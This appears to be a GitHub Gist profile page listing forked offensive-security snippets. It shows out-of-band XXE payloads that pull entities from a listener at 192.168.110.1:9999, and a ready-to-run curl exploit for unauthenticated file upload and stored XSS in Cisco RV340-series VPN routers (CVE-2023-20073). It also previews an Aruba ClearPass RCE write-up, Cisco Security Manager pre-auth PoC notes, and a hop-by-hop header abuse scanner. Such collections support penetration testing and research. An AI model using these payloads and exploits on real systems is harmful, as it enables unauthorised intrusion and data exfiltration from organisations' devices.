Skip to content

Instantly share code, notes, and snippets.

View Pear1y's full-sized avatar
💭
I may be slow to respond.

Pear1y Pear1y

💭
I may be slow to respond.
107 followers · 53 following
  • Cyber Security
  • Bermuda
View GitHub Profile
@Pear1y
Pear1y / XXE_payloads
Last active February 22, 2024 03:58 — forked from staaldraad/XXE_payloads
XXE Payloads
--------------------------------------------------------------
OOB XXE(Verified)
--------------------------------------------------------------
<?xml version="1.0"?><!DOCTYPE root [<!ENTITY % xxx SYSTEM "http://192.168.110.1:9999/x"> %xxx;]>
<?xml version="1.0"?><!DOCTYPE ANY [<!ENTITY % xxx SYSTEM "http://192.168.110.1:9999/x"> %xxx;]><r></r>
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE ANY [
@Pear1y
Pear1y / CVE-2023-20073.sh
Created August 20, 2023 06:03 — forked from win3zz/CVE-2023-20073.sh
Unauthenticated Arbitrary File Upload and Stored XSS in Cisco RV340, RV340W, RV345, RV345P VPN Routers (CVE-2023-20073)
TARGET="https://0.0.0.0"; \
FILENAME="login.html"; \
echo "<b>CVE-2023-20073</b> exploit test.<br><script>alert('JS-test')</script>" > $FILENAME; \
curl -ksX POST "$TARGET/api/operations/ciscosb-file:form-file-upload" -H "Authorization: 1" -F "pathparam=Portal" -F "fileparam=${FILENAME}" -F "file.path=${FILENAME}" -F "file=@${FILENAME};type=application/octet-stream"; \
echo "Access the uploaded file through the following link: $TARGET/$FILENAME"
@Pear1y
Pear1y / CVE-2020-7115.md
Created November 8, 2022 08:01 — forked from Retr02332/CVE-2020-7115.md
Entendiendo a detalle el CVE-2020-7115

CVE-2020-7115 (Aruba Clearpass RCE)

Reconocimiento

Cuando seleccionamos un dominio como objetivo, y en la toma de huellas dactilares encontramos que el aplicación web funciona con java en el backend. Es interesante buscar archivos como struts.xml para agrandar aun mas la superficie de ataque.

Struts es un framework web (MVC) orientado a tecnologías java. En este archivo define algunas configuraciones del sitio. Entre ellas hay una en particular que puede ser de gran utilidad para un atacante. El elemento <action>.

¿Que es un archivo struts.xml?

Es un archivo de configuración XML para especificar la relación entre una URL, una clase Java y una página de vista (como index.jsp).

@Pear1y
Pear1y / CSM_pocs.md
Created September 27, 2022 10:18 — forked from Frycos/CSM_pocs.md

TLDR

Cisco Security Manager is an enterprise-class security management application that provides insight into and control of Cisco security and network devices. Cisco Security Manager offers comprehensive security management (configuration and event management) across a wide range of Cisco security appliances, including Cisco ASA Adaptive Security Appliances, Cisco IPS Series Sensor Appliances, Cisco Integrated Services Routers (ISRs), Cisco Firewall Services Modules (FWSMs), Cisco Catalyst, Cisco Switches and many more. Cisco Security Manager allows you to manage networks of all sizes efficiently-from small networks to large networks consisting of hundreds of devices.

Several pre-auth vulnerabilities were submitted to Cisco on 2020-07-13 and (according to Cisco) patched in version 4.22 on 2020-11-10. Release notes didn't state anything about the vulnerabilities, security advisories were not published. All payload are processed in the context of NT AUTHORITY\SYSTEM.

@Pear1y
Pear1y / FindClass_final.java
Created July 12, 2022 07:19 — forked from fnmsd/FindClass_final.java
//Author:fnmsd
//Blog:https://blog.csdn.net/fnmsd
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import java.lang.reflect.Field;
import java.util.HashSet;
import java.util.Scanner;
public class a {
@Pear1y
Pear1y / hbh-header-abuse-test.py
Created May 16, 2022 08:53 — forked from ndavison/hbh-header-abuse-test.py
Attempts to find hop-by-hop header abuse potential against the provided URL.
# github.com/ndavison
import requests
import random
import string
from argparse import ArgumentParser
parser = ArgumentParser(description="Attempts to find hop-by-hop header abuse potential against the provided URL.")
parser.add_argument("-u", "--url", help="URL to target (without query string)")